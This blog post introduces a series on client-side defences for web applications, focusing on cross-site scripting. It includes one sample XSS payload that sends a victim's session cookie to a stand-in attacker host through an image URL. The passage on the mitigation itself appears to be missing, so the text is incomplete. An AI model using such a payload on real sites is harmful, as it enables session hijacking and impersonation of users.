Driven by our secure software development activities, we will publish a series of articles on second line of defence web application security techniques, starting with this article.
This added complexity does not only make it harder to secure web applications, but also introduced new vulnerabilities that need to be considered.
Because it is so hard to properly secure web applications we have to deal with the fact that there will be vulnerabilities on the server side. Therefore, security experts, browser vendors and web standard committees started introducing more client side defenses. These defenses do not replace secure development approaches on the server side code but are meant to complement the server-side defenses as a second line of defense, so that even if a web application contains a vulnerability, the browser might be able to prevent exploitation of the vulnerability.
It is sometimes hard to keep up with these new additional defenses. We will publish blog posts each describing one or two of these defensive mechanisms that will help to additionally secure modern web applications.
Web vulnerabilities like SQL injections still affect a lot of web applications, but server-side mitigation techniques are well known and good to handle. But one type of vulnerability seems to be especially hard to mitigate:
Cross-Site-Scripting (XSS). ( https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) ).
A typical XSS attack targets the session cookie. If an attacker is able to steal the session cookie he is in posession of the session id and can impersonate the user by taking over his session. A simple payload that achieves this is:
<script>document.write("<img src='http://attacker.example.com/" + escape(document.cookie) + "' />")</script>
This is only a very basic defense, which only protects against the simplest and most common attacks. If the attacker uses a more sophisticated payload he can easily impersonate the user without stealing the session cookie, but solely via the XSS payload e.g. by circumventing cross site request forgery protections.
Stay tuned to learn about additional second line of defense mechanisms!
Michael Rodler, Limes Security